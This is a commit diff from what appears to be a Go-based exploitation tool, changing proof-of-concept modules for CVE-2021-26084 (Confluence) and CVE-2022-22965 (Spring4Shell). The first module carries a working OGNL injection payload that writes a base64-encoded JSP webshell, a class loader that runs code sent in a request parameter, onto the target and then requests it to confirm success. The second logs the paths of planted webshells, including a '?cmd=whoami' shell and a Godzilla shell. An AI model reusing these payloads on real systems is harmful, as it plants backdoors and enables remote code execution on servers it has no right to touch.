fix CVE-2021-26084验证错误

Author: SummerSec

cmd/commons/poc/2021/CVE-2021-26084.go

@@ -16,7 +16,7 @@ func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) {
 	reqmap := structs.Map(reqinfo)
 	u := target + "pages/doenterpagevariables.action"
 	shell := "PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmEuaW8uKixqYXZhLnV0aWwuemlwLioiJT4NCjwlIQ0KICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgew0KICAgIFUoQ2xhc3NMb2FkZXIgYykgew0KICAgICAgc3VwZXIoYyk7DQogICAgfQ0KICAgIHB1YmxpYyBDbGFzcyBnKGJ5dGVbXSBiKSB7DQogICAgICByZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoYiwgMCwgYi5sZW5ndGgpOw0KICAgIH0NCiAgfQ0KICBwdWJsaWMgYnl0ZVtdIGRlY29tcHJlc3MoYnl0ZVtdIGRhdGEpIHsNCiAgICBieXRlW10gb3V0cHV0ID0gbmV3IGJ5dGVbMF07DQogICAgSW5mbGF0ZXIgZGMgPSBuZXcgSW5mbGF0ZXIoKTsNCiAgICBkYy5yZXNldCgpOw0KICAgIGRjLnNldElucHV0KGRhdGEpOw0KICAgIEJ5dGVBcnJheU91dHB1dFN0cmVhbSBvID0gbmV3IEJ5dGVBcnJheU91dHB1dFN0cmVhbShkYXRhLmxlbmd0aCk7DQogICAgdHJ5IHsNCiAgICAgIGJ5dGVbXSBidWYgPSBuZXcgYnl0ZVsxMDI0XTsNCiAgICAgIHdoaWxlICghZGMuZmluaXNoZWQoKSkgew0KICAgICAgICBpbnQgaSA9IGRjLmluZmxhdGUoYnVmKTsNCiAgICAgICAgby53cml0ZShidWYsIDAsIGkpOw0KICAgICAgfQ0KICAgICAgb3V0cHV0ID0gby50b0J5dGVBcnJheSgpOw0KICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7DQogICAgICAgIG91dHB1dCA9IGRhdGE7DQogICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgfSBmaW5hbGx5IHsNCiAgICAgIHRyeSB7DQogICAgICAgICAgby5jbG9zZSgpOw0KICAgICAgfSBjYXRjaCAoSU9FeGNlcHRpb24gZSkgew0KICAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgICB9DQogICAgfQ0KICAgIGRjLmVuZCgpOw0KICAgIHJldHVybiBvdXRwdXQ7DQogIH0NCiAgcHVibGljIGJ5dGVbXSBiYXNlNjREZWNvZGUoU3RyaW5nIHN0cikgdGhyb3dzIEV4Y2VwdGlvbiB7DQogICAgdHJ5IHsNCiAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOw0KICAgICAgcmV0dXJuIChieXRlW10pIGNsYXp6LmdldE1ldGhvZCgiZGVjb2RlQnVmZmVyIiwgU3RyaW5nLmNsYXNzKS5pbnZva2UoY2xhenoubmV3SW5zdGFuY2UoKSwgc3RyKTsNCiAgICB9IGNhdGNoIChFeGNlcHRpb24gZSkgew0KICAgICAgQ2xhc3MgY2xhenogPSBDbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7DQogICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsNCiAgICAgIHJldHVybiAoYnl0ZVtdKSBkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGUiLCBTdHJpbmcuY2xhc3MpLmludm9rZShkZWNvZGVyLCBzdHIpOw0KICAgIH0NCiAgfQ0KJT4NCjwlDQogIFN0cmluZyBjbHMgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiYW50Iik7DQogIGlmIChjbHMgIT0gbnVsbCkgew0KICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGRlY29tcHJlc3MoYmFzZTY0RGVjb2RlKGNscykpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7DQogIH0NCiU+"
-	// DoRunning.jsp
+	// testAnt.jsp
 	data := "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var b64Shell=\\u0027" + url.QueryEscape(shell) + "\\u0027;var shell=new java.lang.String(java.util.Base64.getDecoder().decode(b64Shell));var f=new java.io.FileOutputStream(new java.io.File(\\u0027../confluence/testAnt.jsp\\u0027));f.write(shell.getBytes());f.close();\\u0022)}%2b\\u0027"
 	reqmap["url"] = u
 	reqmap["method"] = "POST"
@@ -35,8 +35,10 @@ func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) {
 	file := hashmap["Out"].(string)
 	utils.Send(reqmap)
 
-	reqmap["url"] = target + "DoRnning.jsp"
-	reqmap["body"] = "pass"
+	// 验证是否利用成功
+	reqmap["url"] = target + "testAnt.jsp"
+	reqmap["method"] = "GET"
+	reqmap["body"] = ""
 
 	resp := utils.Send(reqmap)
 
@@ -57,7 +59,7 @@ func (CVE202126084) SaveResult(target string, file string) {
 }
 
 func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
-	if !resp.IsSuccess() {
+	if resp.IsSuccess() {
 		log.Debugf(resp.Dump())
 		return true
 	}

cmd/commons/poc/2022/CVE-2022-22965.go

@@ -83,6 +83,7 @@ func (p CVE202222965) SendPoc(target string, hashmap map[string]interface{}) {
 		r, _ := url.Parse(target)
 		log.Info("[+] CVE202222965 poc success")
 		res := target + " 可能存在CVE202222965没有进行验证 手动验证: " + r.Scheme + "://" + r.Host + "/" + shellname + ".jsp" + "?cmd=whoami or " + r.Scheme + "://" + r.Host + "/" + shellname1 + ".jsp 哥斯拉 pass key  "
+		log.Info(res)
 		p.SaveResult(res, hashmap["Out"].(string))
 
 		// 第三个请求